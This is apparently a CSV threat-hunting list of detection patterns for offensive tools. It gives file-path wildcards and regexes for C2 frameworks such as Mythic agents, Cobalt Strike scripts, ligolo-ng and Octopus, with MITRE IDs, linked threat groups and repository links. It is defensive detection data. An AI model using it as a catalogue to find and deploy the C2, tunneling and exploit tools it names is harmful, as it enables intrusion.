"*/afp-showmount.nse*",".{0,1000}\/afp\-showmount\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5225"
"*/afrog-pocs/*",".{0,1000}\/afrog\-pocs\/.{0,1000}","offensive_tool_keyword","afrog","A tool for finding vulnerabilities","T1083 - T1065 - T1204 - T1046","TA0007 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/zan8in/afrog","1","1","N/A","N/A","N/A","10","3791","414","2025-04-22T07:32:19Z","2022-02-24T06:00:32Z","5226"
"*/agent -connect http* --proxy*",".{0,1000}\/agent\s\-connect\shttp.{0,1000}\s\-\-proxy.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#linux","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","5227"
"*/agent.ps1.oct*",".{0,1000}\/agent\.ps1\.oct.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","5228"
"*/agent/C/src/*",".{0,1000}\/agent\/C\/src\/.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","5230"
"*/agent/stagers/dropbox.py*",".{0,1000}\/agent\/stagers\/dropbox\.py.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","5234"
"*/agent_code/Apollo/*",".{0,1000}\/agent_code\/Apollo\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","5235"
"*/agent_code/Athena*",".{0,1000}\/agent_code\/Athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5236"
"*/agent_code/cmd_executor*",".{0,1000}\/agent_code\/cmd_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","5237"
"*/agent_code/dll.go*",".{0,1000}\/agent_code\/dll\.go.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","5238"
"*/agent_code/merlin.*",".{0,1000}\/agent_code\/merlin\..{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","5239"
"*/agent_code/powershell_executor*",".{0,1000}\/agent_code\/powershell_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","5240"
"*/agent_code/sh_executor*",".{0,1000}\/agent_code\/sh_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","5241"
"*/agent_code/zsh_executor*",".{0,1000}\/agent_code\/zsh_executor.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","5242"
"*/agent_functions/*.py*",".{0,1000}\/agent_functions\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5243"
"*/agent_icons/athena.svg*",".{0,1000}\/agent_icons\/athena\.svg.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5244"
"*/agents/thanatos/commands/*",".{0,1000}\/agents\/thanatos\/commands\/.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","5245"
"*/AggressiveClean.cna*",".{0,1000}\/AggressiveClean\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","N/A","10","10","192","31","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z","5246"
"*/aggressor/*.java*",".{0,1000}\/aggressor\/.{0,1000}\.java.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","5247"
"*/aggressor/spoolsystem.cna*",".{0,1000}\/aggressor\/spoolsystem\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","5248"
"*/aggressor-powerview*",".{0,1000}\/aggressor\-powerview.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","5249"
"*/AggressorScripts*",".{0,1000}\/AggressorScripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5250"
"*/AggressorScripts*",".{0,1000}\/AggressorScripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z","5251"
"*/AggressorScripts*",".{0,1000}\/AggressorScripts.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","N/A","10","10","150","35","2023-12-01T03:18:35Z","2019-02-22T09:36:44Z","5252"
"*/agscript *",".{0,1000}\/agscript\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","#linux","N/A","10","10","540","86","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z","5253"
"*/agscript *",".{0,1000}\/agscript\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5254"
"*/ahmedkhlief/Ninja/*",".{0,1000}\/ahmedkhlief\/Ninja\/.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","5261"
"*/ahrixia/CVE_2022_0847*",".{0,1000}\/ahrixia\/CVE_2022_0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/ahrixia/CVE_2022_0847","1","1","N/A","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z","5262"
"*/ajp-auth.nse*",".{0,1000}\/ajp\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5263"
"*/ajp-brute.nse*",".{0,1000}\/ajp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5264"
"*/ajp-headers.nse*",".{0,1000}\/ajp\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5265"
"*/ajp-methods.nse*",".{0,1000}\/ajp\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5266"
"*/ajp-request.nse*",".{0,1000}\/ajp\-request\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5267"
"*/AKID-RATV04.exe*",".{0,1000}\/AKID\-RATV04\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5268"
